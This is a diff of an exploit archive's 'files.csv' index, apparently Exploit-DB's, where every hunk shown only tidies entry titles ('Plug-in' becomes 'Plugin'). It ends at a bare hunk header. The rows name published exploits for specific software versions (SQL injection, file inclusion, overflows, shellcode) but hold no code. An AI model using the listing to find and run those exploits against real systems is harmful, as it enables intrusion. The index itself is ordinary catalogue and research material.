DB: 2015-10-02

9 new exploits

files.csv

@@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port
 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
-1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
+1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
@@ -3094,7 +3094,7 @@ id,file,description,date,author,platform,type,port
 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0
 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0
 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0
-3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0
+3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0
 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
@@ -3818,7 +3818,7 @@ id,file,description,date,author,platform,type,port
 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0
 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0
-4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
+4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0
 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0
 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0
@@ -5047,7 +5047,7 @@ id,file,description,date,author,platform,type,port
 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0
-5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
+5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0
 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0
 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0
@@ -8414,7 +8414,7 @@ id,file,description,date,author,platform,type,port
 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
-8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
+8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0
 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0
 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0
@@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port
 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0
 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0
 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0
-8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
+8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
 8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0
 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0
 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0
@@ -12475,7 +12475,7 @@ id,file,description,date,author,platform,type,port
 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
-14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
+14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0
 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0
 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
@@ -16402,7 +16402,7 @@ id,file,description,date,author,platform,type,port
 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0
 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0
-18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
+18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
@@ -19395,11 +19395,11 @@ id,file,description,date,author,platform,type,port
 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0
 22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0
 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0
-22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plug-in MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
-22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
+22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
+22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
 22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0
 22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0
 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0
@@ -20176,10 +20176,10 @@ id,file,description,date,author,platform,type,port
 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0
 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0
 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0
-22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
+22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0
 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0
-22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
+22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0
 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0
 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0
@@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port
 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0
 23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0
 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0
-23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
+23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0
@@ -20491,12 +20491,12 @@ id,file,description,date,author,platform,type,port
 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0
 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0
 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0
-23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
+23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0
 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0
 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0
-23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
+23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0
 23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability",2003-10-22,"Jon Hart",solaris,remote,0
 23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability",2003-10-22,"Andreas Boeckler",windows,dos,0
@@ -20504,7 +20504,7 @@ id,file,description,date,author,platform,type,port
 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0
 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0
 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0
-23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
+23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0
 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
@@ -21114,7 +21114,7 @@ id,file,description,date,author,platform,type,port
 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0
 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
-23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
+23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0
 23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure Vulnerability",2004-04-06,dr_insane,cgi,webapps,0
 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
@@ -21193,7 +21193,7 @@ id,file,description,date,author,platform,type,port
 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0
 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0
 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0
-23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
+23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0
 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0
@@ -21576,7 +21576,7 @@ id,file,description,date,author,platform,type,port
 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0
 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0
 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0
-24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
+24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
 24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0
@@ -21922,7 +21922,7 @@ id,file,description,date,author,platform,type,port
 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0
 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0
 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0
-24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
+24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
 24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0
 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0
 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0
@@ -22855,7 +22855,7 @@ id,file,description,date,author,platform,type,port
 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
-25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
+25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability",2005-05-26,"Marek Bialoglowy",hardware,dos,0
 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0
 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0
@@ -23097,7 +23097,7 @@ id,file,description,date,author,platform,type,port
 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0
 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0
-25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
+25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0
 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0
 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
@@ -25693,7 +25693,7 @@ id,file,description,date,author,platform,type,port
 28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 shows_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
-28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
+28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0
 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0
 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0
@@ -27154,7 +27154,7 @@ id,file,description,date,author,platform,type,port
